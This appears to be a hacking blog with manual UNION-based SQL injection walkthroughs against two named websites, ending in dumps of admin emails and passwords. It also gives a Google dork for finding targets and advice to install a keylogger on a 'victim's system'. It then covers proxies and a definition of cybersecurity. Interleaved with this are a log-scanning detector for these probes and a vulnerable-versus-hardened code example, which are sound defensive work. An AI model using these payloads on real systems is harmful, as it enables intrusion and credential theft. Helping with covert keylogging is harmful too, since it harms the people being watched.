SQL INJECTION

I have a vulnerable website:

http://www.morephotosradio.com/transcript.php?interview_id=2021

To check whether this website is vulnerable, put a ' sign at the end of the link, like this:

==>http://www.morephotosradio.com/transcript.php?interview_id=2021'

The page will show an SQLi error.

==> Find the number of columns by using an order by --+ query, like this:

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 7--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 15--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 30--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+ Error

==> This error shows that the query has 46 columns

==> Now remove order by, go to UNION Based in HackBar, and click on the union+all+select statement

==> A small box will open. In that box, type the number of columns; for this website it is 46

==> Also place a - sign before the id parameter value, like this (id=-2021)

==> Press Execute. Some numbers will be shown on the page. Replace any one number with group_concat(table_name) and write from information_schema.tables where table_schema=database()--+ at the end of the URL

To find table information:

http://www.morephotosradio.com/transcript.php?interview_id=-2021 UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+where+table_schema=database()--+

==> The page will show all table names. We want to hack the website, so we need to find the admin username and password

==> Now remove database() from the query, go to SQL Basics, then CHAR(), then MySQL CHAR(); a small window will open

==> In that window, type a table name such as admin, user or member. I will type user because my admin table name is user

==> Click OK. Now replace the following parts of the query:

group_concat(table_name) to group_concat(column_name)

table_schema to table_name

information_schema.tables to information_schema.columns

database() is already removed, and the MySQL CHAR() value of user is placed where user would go

==> The query for columns will become like this:

http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_schema.columns where table_name=CHAR(117, 115, 101, 114)--+

Press Execute

==> Now we need admin emails and passwords

Replace column_name with any column names you need, like email and password, and at the end of the URL write from user, like this:

http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from user--+

Press Execute
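For whoever runs a site like this, each step above leaves a distinctive query string in the web server's access log. The following is an added example, not part of the original post: a small Python scanner that decodes query parameters from access-log lines and flags the request shapes used in this walkthrough. The rule names, the log lines and the IP addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Patterns for the request shapes used in the walkthrough above.
RULES = {
    "stray_quote": re.compile(r"^-?\d+['\"]"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)*\s*\)", re.I),
    "trailing_comment": re.compile(r"(--|#)\s*$"),
}
# Common/combined log format: client IP, two fields, [timestamp], "METHOD target PROTO"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

def classify(value):
    """Return the sorted names of the rules that match one decoded parameter value."""
    return sorted(name for name, rx in RULES.items() if rx.search(value))

def scan(lines):
    """Return [(client_ip, parameter, [rule, ...])] for requests that match any rule."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qsl percent-decodes values and turns '+' into a space
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append((ip, key, hits))
    return findings

# Constructed sample lines (documentation IP ranges, shortened column lists).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /transcript.php?interview_id=2021 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?q=order+by+phone HTTP/1.1" 200 900',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /transcript.php?interview_id=2021%27 HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2024:10:01:20 +0000] "GET /transcript.php?interview_id=2021+order+by+47--+ HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--+ HTTP/1.1" 200 5300',
    '203.0.113.9 - - [01/Jan/2024:10:02:30 +0000] "GET /transcript.php?interview_id=-2021+UNION+SELECT+1,group_concat(column_name)+from+information_schema.columns+where+table_name=CHAR(117,115,101,114)--+ HTTP/1.1" 200 5300',
]

if __name__ == "__main__":
    for ip, param, hits in scan(SAMPLE_LOG):
        print(ip, param, ", ".join(hits))
```

A burst of `order_by_probe` hits from one client with rising numbers, followed by `union_select` and `schema_enum`, is the column-count and schema enumeration sequence described above and is worth alerting on as a unit.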


Introduction to SQL injection: manual, UNION-based

Hey pen-testers, today in this post I am going to give details on one of the top-most vulnerabilities in today's world: SQL injection.

For this you need a SQL-vulnerable website and HackBar, a plugin for Firefox, and that's it. You can download HackBar from here: https://addons.mozilla.org/en-us/firefox/addon/hackbar/

Back to the main point: in this article I am using the Google dork "article.php?id=5"

and I got a website named: www.designsmells.com/article.php?id=5

Now, to check whether the site is vulnerable to SQL injection or not, we just put the ( ' ) without brackets and see whether we get an error or not. Let's see:

http://www.designsmells.com/article.php?id=5' --> gives an error, so it is clear that we have a website with SQL injection

PART-2 TO GET NUMBER OF COLUMNS

In order to get the number of columns we can use any of the statements

  • ORDER BY
  • GROUP BY
  • PROCEDURE ANALYSE()

So to get the columns we try "order by", with 2 negative signs at the end to turn the rest of the query into a comment so that it executes without error:

"www.designsmells.com/article.php?id=5 order by 1 --" > no error

"www.designsmells.com/article.php?id=5 order by 10 --" > no error

"www.designsmells.com/article.php?id=5 order by 15 --" > error

So the number of columns lies in 10<n<15, and if we keep checking we get 11 columns:

"www.designsmells.com/article.php?id=5 order by 11--" > no error

Then select everything after ?id=5 and replace it with "union select 1,2,3,4........,11 --"

so the URL becomes

"www.designsmells.com/article.php?id=5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11-- " and hit enter

If there is no change, then just add a " - " in front of the ID and a " + " at the end, so the URL becomes "www.designsmells.com/article.php?id=-5 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--+ " and it will dump out the vulnerable columns. To get the database we choose the number which is in "bold letters"

PART -3 GETTING CREDENTIALS!!

Here we replace the column number "2" first with "database()" and then with "version()" to get the database name and version respectively,

and the URL becomes: "www.designsmells.com/article.php?id=-5 UNION SELECT 1,database(),3,4,5,6,7,8,9,10,11--+ "

Then we go for the version() check and we get: "www.designsmells.com/article.php?id=-5 UNION SELECT 1,version(),3,4,5,6,7,8,9,10,11--+ "

Now replace version() with "group_concat(table_name,0x0a)" and add " from information_schema.tables where table_schema=database() "

and we get the desired URL as "www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--+ "

We get some of the table names, and next we change the URL to: "www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_schema=database()--+"

It will dump out the various columns. Out of these we focus on columns named admin, login, user etc., and here we clearly get the "user_id" & "password" columns. So our next step is to get data out of these two:

"www.designsmells.com/article.php?id=-5 UNION SELECT 1,group_concat(user_id,0x3a,user_name,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11 from book_user--+ " and thus we get the user id along with its password.

Once we have found the admin panel of the website, either using robots.txt or alchemist admin finder, we can enter the website in a genuine way

Stay tuned guys & keep on testing 🙂
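Every step in this post works only because the id parameter is pasted into the SQL text and the database error is shown to the visitor. The following is an added example, not code from the original post or from the site it discusses: the vulnerable lookup beside a hardened one, in Python with an in-memory SQLite database standing in for the site's MySQL. The table layout, the data and the function names are assumptions, and the probe strings are the post's inputs shortened to three columns.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the site's database; all rows are constructed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE book_user (user_id INTEGER, user_name TEXT, password TEXT);
        INSERT INTO article VALUES (5, 'Design smells', 'Article text');
        INSERT INTO book_user VALUES (1, 'admin', 'constructed-hash');
    """)
    return db

def get_article_vulnerable(db, raw_id):
    # The flaw: the parameter becomes part of the SQL text, so anything
    # after the number is parsed as SQL.
    return db.execute("SELECT id, title, body FROM article WHERE id = " + raw_id).fetchall()

def outcome_vulnerable(db, raw_id):
    """What the vulnerable page exposes for one input: rows, or the raw SQL error."""
    try:
        return get_article_vulnerable(db, raw_id)
    except sqlite3.Error as exc:
        return "sql-error: " + str(exc)   # echoing this is what makes probing possible

def get_article_safe(db, raw_id):
    """Hardened lookup: allow-list the id, bind it as a parameter, hide DB errors."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return 400, "Bad request"         # same generic answer for every malformed id
    try:
        row = db.execute("SELECT id, title, body FROM article WHERE id = ?",
                         (int(raw_id),)).fetchone()
    except sqlite3.Error:
        return 500, "Internal error"      # log details server-side only
    return (200, row) if row else (404, "Not found")

# Inputs shaped like the ones in the post, shortened to this table's 3 columns.
PROBES = ["5'", "5 order by 3--", "5 order by 4--",
          "-5 UNION SELECT user_id,user_name,password FROM book_user--"]

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(repr(probe), "| vulnerable:", outcome_vulnerable(db, probe),
              "| safe:", get_article_safe(db, probe))
```

With the hardened handler every probe gets the same 400 response, so there is no error/no-error difference to count columns with and no way to append a second SELECT.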

Introduction to key loggers & prevention from them

Hey there, capturing someone's key-strokes is quite possible now, in order to get access to his/her social media accounts or, even worse, bank credentials.

PART-1 "PREVENTION"

To get protection from these types of key loggers we need to be aware, and one should always use osk, i.e. the On-Screen Keyboard that is there in our systems; we can open it by pressing "windows+r", typing "osk" and hitting enter.

PART-2 "ATTACK BY KEY-LOGGERS"

Using: Family key-logger

Just install any of the key loggers available, such as family key-logger, golden key-logger and many more, from the given link http://www.spyarsenal.com, and install it on your victim's system, or on yours too if he/she is going to use your system.

You will see a block at the bottom right corner to confirm that your family key logger is at work!! Now if someone types anything anywhere, either in the system or in the browser, their key-strokes will be captured and you can view them anytime.

Some key loggers also provide remote access and an e-mail facility for sending you the log details.

Proxy


Types of proxy:

  • Application based
  • Browser based
  • Web based

1. Application-based proxy: In an application-based proxy we work with application software like Ultrasurf to apply a dummy identity.

To download this click on this link http://ultrasurf.us/download/u.zip

2. Browser-based proxy: A browser-based proxy works inside the browser as an add-on, in browsers like Mozilla Firefox and Google Chrome, for example the anonymoX add-on in Mozilla.

3. Web-based proxy: A web-based proxy works on web pages, applying the proxy to searches made via search engines, for example http://www.kproxy.com

Cyber Security


Computer security, also known as cybersecurity or IT security, is security applied to computing devices such as computers and smartphones, as well as to both private and public computer networks, including the whole Internet. The field includes all the processes and mechanisms by which digital equipment, information and services are protected from unintended or unauthorized access, change or destruction, and is of growing importance due to the increasing reliance of computer systems in most societies. It includes physical security to prevent theft of equipment and information security to protect the data on that equipment. Those terms generally do not refer to physical security, but a common belief among computer security experts is that a physical security breach is one of the worst kinds of security breaches as it generally allows full access to both data and equipment.

Cybersecurity is the process of applying security measures to ensure confidentiality, integrity, and availability of data. Cybersecurity attempts to assure the protection of assets, which includes data, desktops, servers, buildings, and most importantly, humans. The goal of cybersecurity is to protect data both in transit and at rest. Countermeasures can be put in place in order to increase the security of data. Some of these measures include, but are not limited to, access control, awareness training, audit and accountability, risk assessment, penetration testing, vulnerability management, and security assessment and authorization.